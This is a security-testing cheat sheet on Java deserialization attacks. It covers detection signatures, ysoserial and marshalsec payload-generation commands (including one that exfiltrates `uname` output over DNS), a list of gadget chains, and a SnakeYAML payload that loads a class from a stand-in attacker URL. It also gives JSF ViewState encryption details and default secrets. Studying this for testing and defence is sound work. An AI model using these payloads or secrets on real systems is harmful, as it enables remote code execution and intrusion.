Java Deserialization
Java serialization is the process of converting a Java object’s state into a byte stream, which can be stored or transmitted and later reconstructed (deserialized) back into the original object. Serialization in Java is primarily done using the
Serializable
interface, which marks a class as serializable, allowing it to be saved to files, sent over a network, or transferred between JVMs.
Summary
Detection
"AC ED 00 05"
in HexAC ED
: STREAM_MAGIC. Specifies that this is a serialization protocol.00 05
: STREAM_VERSION. The serialization version.
"rO0"
in Base64Content-Type
= "application/x-java-serialized-object""H4sIAAAAAAAAAJ"
in gzip(base64)
Tools
Ysoserial
frohoff/ysoserial : A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
java -jar ysoserial.jar CommonsCollections1 calc.exe > commonpayload.bin
java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin
java -jar ysoserial.jar Groovy1 'ping 127.0.0.1' > payload.bin
java -jar ysoserial.jar Jdk7u21 bash -c 'nslookup `uname`.[redacted]' | gzip | base64
List of payloads included in ysoserial:
Payload | Authors | Dependencies |
---|---|---|
AspectJWeaver | @Jang | aspectjweaver:1.9.2, commons-collections:3.2.2 |
BeanShell1 | @pwntester, @cschneider4711 | bsh:2.0b5 |
C3P0 | @mbechler | c3p0:0.9.5.2, mchange-commons-java:0.2.11 |
Click1 | @artsploit | click-nodeps:2.3.0, javax.servlet-api:3.1.0 |
Clojure | @JackOfMostTrades | clojure:1.8.0 |
CommonsBeanutils1 | @frohoff | commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2 |
CommonsCollections1 | @frohoff | commons-collections:3.1 |
CommonsCollections2 | @frohoff | commons-collections4:4.0 |
CommonsCollections3 | @frohoff | commons-collections:3.1 |
CommonsCollections4 | @frohoff | commons-collections4:4.0 |
CommonsCollections5 | @matthias_kaiser, @jasinner | commons-collections:3.1 |
CommonsCollections6 | @matthias_kaiser | commons-collections:3.1 |
CommonsCollections7 | @scristalli, @hanyrax, @EdoardoVignati | commons-collections:3.1 |
FileUpload1 | @mbechler | commons-fileupload:1.3.1, commons-io:2.4 |
Groovy1 | @frohoff | groovy:2.3.9 |
Hibernate1 | @mbechler | |
Hibernate2 | @mbechler | |
JBossInterceptors1 | @matthias_kaiser | javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21 |
JRMPClient | @mbechler | |
JRMPListener | @mbechler | |
JSON1 | @mbechler | json-libjdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1 |
JavassistWeld1 | @matthias_kaiser | javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21 |
Jdk7u21 | @frohoff | |
Jython1 | @pwntester, @cschneider4711 | jython-standalone:2.5.2 |
MozillaRhino1 | @matthias_kaiser | js:1.7R2 |
MozillaRhino2 | @_tint0 | js:1.7R2 |
Myfaces1 | @mbechler | |
Myfaces2 | @mbechler | |
ROME | @mbechler | rome:1.0 |
Spring1 | @frohoff | spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE |
Spring2 | @mbechler | spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2 |
URLDNS | @gebl | |
Vaadin1 | @kai_ullrich | vaadin-server:7.7.14, vaadin-shared:7.7.14 |
Wicket1 | @jacob-baines | wicket-util:6.23.0, slf4j-api:1.6.4 |
Burp extensions
- NetSPI/JavaSerialKiller - Burp extension to perform Java Deserialization Attacks
- federicodotta/Java Deserialization Scanner - All-in-one plugin for Burp Suite for the detection and the exploitation of Java deserialization vulnerabilities
- summitt/burp-ysoserial - YSOSERIAL Integration with Burp Suite
- DirectDefense/SuperSerial - Burp Java Deserialization Vulnerability Identification
- DirectDefense/SuperSerial-Active - Java Deserialization Vulnerability Active Identification Burp Extender
Alternative Tooling
- pwntester/JRE8u20_RCE_Gadget - Pure JRE 8 RCE Deserialization gadget
- joaomatosf/JexBoss - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool
- pimps/ysoserial-modified - A fork of the original ysoserial application
- NickstaDB/SerialBrute - Java serialization brute force attack tool
- NickstaDB/SerializationDumper - A tool to dump Java serialization streams in a more human readable form
- bishopfox/gadgetprobe - Exploiting Deserialization to Brute-Force the Remote Classpath
- k3idii/Deserek - Python code to Serialize and Unserialize java binary serialization format.
- mbechler/marshalsec - Java Unmarshaller Security - Turning your data into code execution
$ java -cp marshalsec.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> [<arguments...>]] $ java -cp marshalsec.jar marshalsec.JsonIO Groovy "cmd" "/c" "calc" $ java -cp marshalsec.jar marshalsec.jndi.LDAPRefServer http://localhost:8000\#exploit.JNDIExploit 1389 // -a - generates/tests all payloads for that marshaller // -t - runs in test mode, unmarshalling the generated payloads after generating them. // -v - verbose mode, e.g. also shows the generated payload in test mode. // gadget_type - Identifier of a specific gadget, if left out will display the available ones for that specific marshaller. // arguments - Gadget specific arguments
Payload generators for the following marshallers are included:
Marshaller | Gadget Impact |
---|---|
BlazeDSAMF(0|3|X) | JDK only escalation to Java serialization various third party libraries RCEs |
Hessian|Burlap | various third party RCEs |
Castor | dependency library RCE |
Jackson | possible JDK only RCE, various third party RCEs |
Java | yet another third party RCE |
JsonIO | JDK only RCE |
JYAML | JDK only RCE |
Kryo | third party RCEs |
KryoAltStrategy | JDK only RCE |
Red5AMF(0|3) | JDK only RCE |
SnakeYAML | JDK only RCEs |
XStream | JDK only RCEs |
YAMLBeans | third party RCE |
YAML Deserialization
SnakeYAML is a popular Java-based library used for parsing and emitting YAML (YAML Ain't Markup Language) data. It provides an easy-to-use API for working with YAML, a human-readable data serialization standard commonly used for configuration files and data exchange.
!!javax.script.ScriptEngineManager [
!!java.net.URLClassLoader [[
!!java.net.URL ["http://attacker-ip/"]
]]
]
ViewState
In Java, ViewState refers to the mechanism used by frameworks like JavaServer Faces (JSF) to maintain the state of UI components between HTTP requests in web applications. There are 2 major implementations:
- Oracle Mojarra (JSF reference implementation)
- Apache MyFaces
Tools:
- joaomatosf/jexboss - JexBoss: Jboss (and Java Deserialization Vulnerabilities) verify and EXploitation Tool
- Synacktiv-contrib/inyourface - InYourFace is a software used to patch unencrypted and unsigned JSF ViewStates.
Encoding
Encoding | Starts with |
---|---|
base64 | rO0 |
base64 + gzip | H4sIAAA |
Storage
The javax.faces.STATE_SAVING_METHOD
is a configuration parameter in JavaServer Faces (JSF). It specifies how the framework should save the state of a component tree (the structure and data of UI components on a page) between HTTP requests.
The storage method can also be inferred from the viewstate representation in the HTML body.
- Server side storage:
value="-XXX:-XXXX"
- Client side storage:
base64 + gzip + Java Object
Encryption
By default MyFaces uses DES as encryption algorithm and HMAC-SHA1 to authenticate the ViewState. It is possible and recommended to configure more recent algorithms like AES and HMAC-SHA256.
Encryption Algorithm | HMAC |
---|---|
DES ECB (default) | HMAC-SHA1 |
Supported encryption methods are BlowFish, 3DES, AES and are defined by a context parameter. The value of these parameters and their secrets can be found inside these XML clauses.
<param-name>org.apache.myfaces.MAC_ALGORITHM</param-name>
<param-name>org.apache.myfaces.SECRET</param-name>
<param-name>org.apache.myfaces.MAC_SECRET</param-name>
Common secrets from the documentation.
Name | Value |
---|---|
AES CBC/PKCS5Padding | NzY1NDMyMTA3NjU0MzIxMA== |
DES | NzY1NDMyMTA=< |
DESede | MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIz |
Blowfish | NzY1NDMyMTA3NjU0MzIxMA |
AES CBC | MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIz |
AES CBC IV | NzY1NDMyMTA3NjU0MzIxMA== |
- Encryption: Data -> encrypt -> hmac_sha1_sign -> b64_encode -> url_encode -> ViewState
- Decryption: ViewState -> url_decode -> b64_decode -> hmac_sha1_unsign -> decrypt -> Data
References
- Detecting deserialization bugs with DNS exfiltration - Philippe Arteau - March 22, 2017
- Hack The Box - Arkham - 0xRick - August 10, 2019
- How I found a $1500 worth Deserialization vulnerability - Ashish Kunwar - August 28, 2018
- Jackson CVE-2019-12384: anatomy of a vulnerability class - Andrea Brancaleoni - July 22, 2019
- Java Deserialization in ViewState - Haboob Team - December 23, 2020
- Java-Deserialization-Cheat-Sheet - Aleksei Tiurin - May 23, 2023
- JSF ViewState upside-down - Renaud Dubourguais, Nicolas Collignon - March 15, 2016
- Misconfigured JSF ViewStates can lead to severe RCE vulnerabilities - Peter Stöckli - August 14, 2017
- Misconfigured JSF ViewStates can lead to severe RCE vulnerabilities - Peter Stöckli - August 14, 2017
- On Jackson CVEs: Don’t Panic — Here is what you need to know - cowtowncoder - December 22, 2017
- Pre-auth RCE in ForgeRock OpenAM (CVE-2021-35464) - Michael Stepankin (@artsploit) - June 29, 2021
- Triggering a DNS lookup using Java Deserialization - paranoidsoftware.com - July 5, 2020
- Understanding & practicing java deserialization exploits - Diablohorn - September 9, 2017